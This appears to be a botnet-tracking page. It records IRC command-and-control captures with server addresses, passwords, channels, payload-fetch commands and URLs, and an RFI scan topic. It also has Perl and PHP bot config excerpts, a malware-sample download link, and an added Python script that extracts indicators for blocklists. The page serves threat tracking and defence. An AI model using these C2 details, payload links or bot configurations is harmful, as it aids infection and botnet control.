88.198.64.134:2345
Nick: New[AUT|00|P|37328]
Username: XP-7319
Joined Channel: #!loco!
Channel Topic for Channel #!loco!: "D http://redir.ec/images2313?="
Private Message to Channel #!loco!: "[M]: Thread Activated: Sending Message With Email."
Private Message to Channel #!loco!: "[M]: Thread Disabled."
Private Message to User New[AUT|00|P|37328]: ".hp http://domredi.com/1/"
infos about hosting: http://whois.domaintools.com/88.198.64.134
14 MB malware samples
Here is another package with different malware samples; ii.exe is the bot exe from snk, our Russian hacker. Download: http://c5be3f78.whackyvidz.com
91.121.96.162 (botnet hosted in France, Paris, Ovh Sas)
Remote Host / Port Number: 91.121.96.162 5540
MODE pLagUe{USA}50784 -ix
JOIN #drako
MODE #drako -ix
PONG irc2.accesox.net
PRIVMSG #drako : Hola Amos.   (Spanish: "Hello masters.")
PONG A99D4269
JOIN ##verga##
MODE ##verga## -ix
PONG f2.accesox.net
MODE pLagUe{USA}55216 -ix
PRIVMSG ##verga## : NueVo PuTo InfeCcIoN.   (Spanish: "New fucking infection.")
infos about hosting: http://whois.domaintools.com/91.121.96.162
unassigned.calpop.com (botnet hosted in United States, Los Angeles, Atmlink Inc)
Remote Host / Port Number:
174.37.200.82 80
216.178.38.224 80
216.178.39.11 80
64.208.241.41 80
69.171.224.42 80
216.240.143.200 1234
PASS xxx
MODE NEW-[USA|00|P|22588] -ix
JOIN #!nn! test
PONG 22
MOTD
NICK NEW-[USA|00|P|22588]
USER XP-4207 * 0 :COMPUTERNAME
infos about hosting: http://whois.domaintools.com/216.240.143.200
onlinedatingsecretfriends.com (malware hosted in United States, Austin, Road Runner Holdco Llc)
Resolved hosts (name, IP):
onlinedatingsecretfriends.com   97.79.238.39
127.0.0.1                       127.0.0.1
onemouseklick.com               96.9.186.133
zonetf.com                      96.9.169.85
freecdvideo.com                 66.199.251.242
www.google.com                  209.85.149.105
www.yahoo.com                   87.248.122.122
Opened listening TCP connection on port: 55192
Outgoing connection to remote server: onlinedatingsecretfriends.com TCP port 80
Outgoing connection to remote server: freecdvideo.com TCP port 80
Outgoing connection to remote server: zonetf.com TCP port 80
Outgoing connection to remote server: zonetf.com TCP
Read more...
xvm-163-151.ghst.net (botnet hosted in France, Gandi Dedicated Hosting Servers)
Remote Host / Port Number: 95.142.163.151 5900
PASS Virus
NICK VirUs-kszumcce
USER VirUs "" "gpm" : 8Coded 8Ahmed.Ramzey@Hotmail.Com..   (the stray 8s are most likely the remains of IRC colour codes)
JOIN #3new# Virus
PONG :TESTING3.VirUs.HERE
infos about hosting: http://whois.domaintools.com/95.142.163.151
h18811652163.rev.rootvps.pl (botnet hosted in Poland, Www.hitme.net.pl)
Linux bots inside. Excerpt of the PHP bot's config array ("haslo" is Polish for "password"):

    var $config = array(
        "server"   => "188.116.52.163",
        "port"     => "31336",
        "pass"     => "haslo",
        "prefix"   => "php",
        "maxrand"  => "3",
        "chan"     => "#php",
        "chan2"    => "#php",
        "key"      => "",
        "modes"    => "+ps",
        "password" => "haslo",

infos about hosting: http://whois.domaintools.com/188.116.52.163
server.gasbian.com (botnet hosted in United States, Chicago, Hostforweb Inc)
205.234.145.229:2345
Nick: New[AUT|00|P|35974]
Username: XP-3032
Joined Channel: #!loco!
Channel Topic for Channel #!loco!: "D http://ibe.am/images004?="
Private Message to Channel #!loco!: "[M]: Thread Activated: Sending Message With Email."
Private Message to Channel #!loco!: "[M]: Thread Disabled."
Private Message to User New[AUT|00|P|35974]: ".hp http://domredi.com/1/"
infos about hosting: http://whois.domaintools.com/205.234.145.229
phython.no-ip.biz (botnet hosted in Republic of Korea, Seoul, Hanaro Telecom Inc)
Linux bots here from an Egyptian hacker. Excerpt of the Perl bot's config:

    my $fakeproc  = "/usr/sbin/httpd";      # process name the bot hides behind
    my $ircserver = "phython.no-ip.biz";
    my $ircport   = "7000";
    my $nickname  = "BR[".int(rand(100))."]";
    my $ident     = "Bra";
    my $channel   = "#help";
    my $admin     = "Bjes";

Scanning actions:
Now talking in #help
Topic On: [ #help ] [ RFI][-][][ http://www.stanford.edu//?_SERVER[DOCUMENT_ROOT]= ]
Topic By: [ Subali ]
Modes
Read more...
aaaaaaa.taybasoft.com (botnet hosted in China, Beijing, Ninbo Lanzhong Network Ltd)
Remote Host / Port Number:
112.78.112.208 80
218.85.133.201 80
89.114.9.42 80
89.114.9.60 80
123.183.217.32 1110
61.158.145.4 6939
PASS laorosr
aaaaaaa.taybasoft.com TCP port 6939
PRIVMSG #d2 :Err0r..
PRIVMSG #d2 :Done..
MODE [N00_USA_XP_2208150] @ -ix
The data identified by the following URLs was then requested from the remote web server (prxjdg.cgi is a proxy-judge script: the bot fetches it to learn its own external IP and which headers it leaks):
* http://www.nippon.to/cgi-bin/prxjdg.cgi
* http://www.cooleasy.com/cgi-bin/prxjdg.cgi
* http://two.natnatraoi.com/ms.exe
Read more...
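The check-in captures on this page (the #!loco!, #drako, #!nn!, #3new# and #d2 entries) all show the same handshake: an optional PASS, a NICK carrying a generated country/OS tag, USER, a "MODE <nick> -ix" line, JOIN with an optional channel key, and commands or payload URLs pushed through the channel topic or a PRIVMSG. The following Python script is an added example, not the tracker's own tooling: it pulls those fields out of a flattened capture into one record per host so the C2 address, password, channel key and URLs can be fed to a blocklist. The three sample strings are retyped from this page's own captures, and the regexes are my assumptions about the sandbox wording (captures written differently will need extra patterns).

```python
"""Pull IRC C2 indicators out of flattened sandbox captures like the ones above.

Added example, not the tracker's own code. The regexes encode my own
assumptions about the capture layout: an "ip port" or "ip:port" pair, raw
IRC client commands, and the sandbox's "Nick:" / "Joined Channel:" wording.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# IRC client commands seen in these captures; a JOIN key must not be one of them.
IRC_CMDS = r"PASS|NICK|USER|JOIN|MODE|PRIVMSG|PONG|MOTD|infos"

HOST_PORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})[: ](\d{1,5})(?![.\d])")
PASS_RE = re.compile(r"\bPASS\s+(\S+)")
NICK_RE = re.compile(r"\b(?:NICK|Nick:)\s+(\S+)")
# "MODE <nick> -ix" (sometimes "MODE <nick> @ -ix"); also a fallback nick source
MODE_IX_RE = re.compile(r"\bMODE\s+(?!#)(\S+)(?:\s+@)?\s+-ix\b")
JOIN_RE = re.compile(r"\bJOIN\s+(#\S+)(?:\s+(?!(?:" + IRC_CMDS + r")\b)(\S+))?")
JOINED_RE = re.compile(r"Joined Channel:\s+(#\S+)")
PONG_RE = re.compile(r"\bPONG\s+:?([A-Za-z][\w.-]*\.[A-Za-z]{2,})")  # server names
URL_RE = re.compile(r"https?://[^\s\"'\u201c\u201d\]]+")
# Country/OS tag in generated nicks: New[AUT|00|P|37328], NEW-[USA|00|P|22588],
# [N00_USA_XP_2208150], pLagUe{USA}50784
GEO_RE = re.compile(r"[\[{](?:N00_)?([A-Z]{2,3})[|_}]")


@dataclass
class C2Record:
    servers: List[Tuple[str, int]] = field(default_factory=list)  # (ip, port) seen
    irc_names: List[str] = field(default_factory=list)            # from PONG replies
    password: Optional[str] = None                                 # PASS <x>
    nick: Optional[str] = None
    geo_tag: Optional[str] = None                                  # country code in nick
    channels: Dict[str, Optional[str]] = field(default_factory=dict)  # channel -> key
    mode_ix: bool = False                                          # sent MODE <nick> -ix
    urls: List[str] = field(default_factory=list)                  # command/payload URLs


def parse_capture(text: str) -> C2Record:
    """Extract the C2 handshake fields from one flattened capture."""
    rec = C2Record()
    rec.servers = [(ip, int(p)) for ip, p in HOST_PORT_RE.findall(text)]
    rec.irc_names = list(dict.fromkeys(PONG_RE.findall(text)))  # dedupe, keep order
    m = PASS_RE.search(text)
    rec.password = m.group(1) if m else None
    m = NICK_RE.search(text) or MODE_IX_RE.search(text)
    if m:
        rec.nick = m.group(1)
        g = GEO_RE.search(rec.nick)
        rec.geo_tag = g.group(1) if g else None
    for chan, key in JOIN_RE.findall(text):
        rec.channels.setdefault(chan, key or None)
    for chan in JOINED_RE.findall(text):
        rec.channels.setdefault(chan, None)
    rec.mode_ix = MODE_IX_RE.search(text) is not None
    # whois links are the analyst's annotation, not something the bot fetched
    rec.urls = [u for u in URL_RE.findall(text) if "whois.domaintools.com" not in u]
    return rec


# Constructed sample input: retyped from the captures on this page, same layout.
SAMPLE_LOCO = (
    "88.198.64.134:2345 Nick: New[AUT|00|P|37328] Username: XP-7319 "
    "Joined Channel: #!loco! Channel Topic for Channel #!loco!: "
    '"D http://redir.ec/images2313?=" '
    'Private Message to User New[AUT|00|P|37328]: ".hp http://domredi.com/1/" '
    "infos about hosting: http://whois.domaintools.com/88.198.64.134"
)
SAMPLE_CALPOP = (
    "Remote Host Port Number 174.37.200.82 80 216.240.143.200 1234 "
    "PASS xxx MODE NEW-[USA|00|P|22588] -ix JOIN #!nn! test PONG 22 MOTD "
    "NICK NEW-[USA|00|P|22588] USER XP-4207 * 0 :COMPUTERNAME"
)
SAMPLE_DRAKO = (
    "91.121.96.162 5540 MODE pLagUe{USA}50784 -ix JOIN #drako MODE #drako -ix "
    "PONG irc2.accesox.net PRIVMSG #drako : Hola Amos. PONG A99D4269 "
    "JOIN ##verga## MODE ##verga## -ix PONG f2.accesox.net"
)

if __name__ == "__main__":
    for name, text in [("loco", SAMPLE_LOCO), ("calpop", SAMPLE_CALPOP), ("drako", SAMPLE_DRAKO)]:
        print(name, parse_capture(text))
```

The "Remote Host / Port Number" tables list every connection the sandbox saw, so `servers` will also contain the port-80 hosts the sample touched before its IRC check-in; the IRC server is the pair whose port reappears in a later "TCP port" line or is the only non-HTTP port, which is a call the analyst still has to make.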